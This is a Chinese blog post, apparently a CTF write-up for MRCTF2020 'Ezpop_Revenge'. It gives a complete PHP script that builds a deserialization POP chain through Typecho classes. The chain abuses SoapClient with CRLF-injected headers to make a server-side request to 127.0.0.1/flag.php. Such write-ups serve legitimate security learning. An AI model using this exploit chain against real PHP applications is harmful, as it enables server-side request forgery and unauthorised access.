web | [MRCTF2020]Ezpop_Revenge

这是一个稍长的pop链构造

构造出ssrf打127.0.0.1

利用soap类

脚本如下：

 1 <?php
 2 
 3 
 4 //第一步 反序列化HelloWorld_DB
 5 class HelloWorld_DB{
 6     private $coincidence;
 7     function __construct(){
 8         $this->coincidence = ['hello' => new Typecho_Db_Query()];
 9     }
10 
11     function  __wakeup(){
12         $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']);
13     }
14 }
15 
16 
17 # 2. 实例化Typecho_Db
18 class Typecho_Db
19 {
20 public function __construct($adapterName, $prefix = 'typecho_')
21     {
22         $this->_adapterName = $adapterName;
23 
24         # 这里触发__toString
25         $adapterName = 'Typecho_Db_Adapter_' . $adapterName;
26 
27         $this->_prefix = $prefix;
28 
29         $this->_adapter = new $adapterName();
30     }
31 }
32 
33 
34 # 3触发Typecho_Db_Query中 _toString
35 class Typecho_Db_Query
36 {
37     private $_sqlPreBuild;
38     private $_adapter;
39 
40     public function __construct()
41     {
42        $target = 'http://127.0.0.1/flag.php';
43         $headers = array(
44         'X-Forwarded-For: 127.0.0.1',
45         'Cookie: PHPSESSID=mz12345678'
46         );
47         $b = new SoapClient(
48             null,
49             array(
50                 'location' => $target,
51                 'user_agent'=>"xxxx\r\n".join("\r\n",$headers),
52                 'uri'      => "xxx")
53         );
54         $this->_sqlPreBuild =array("action"=>"SELECT");
55         $this->_adapter = $b;
56     }
57 }
58 
59 
60 
61 $a = new HelloWorld_DB();
62 $aa = serialize($a);
63 var_dump($aa);
64 var_dump(base64_encode($aa));
65 
66 ?>

有的wp里提到了需要%00转\00然后s转S实际上用不到毕竟解码完啥也没过滤。

over.

posted @ 2020-12-31 11:40 Mz1 阅读(358) 评论(0) 编辑收藏举报

刷新页面返回顶部

Mz1

心有猛虎，细嗅蔷薇。

web | [MRCTF2020]Ezpop_Revenge

公告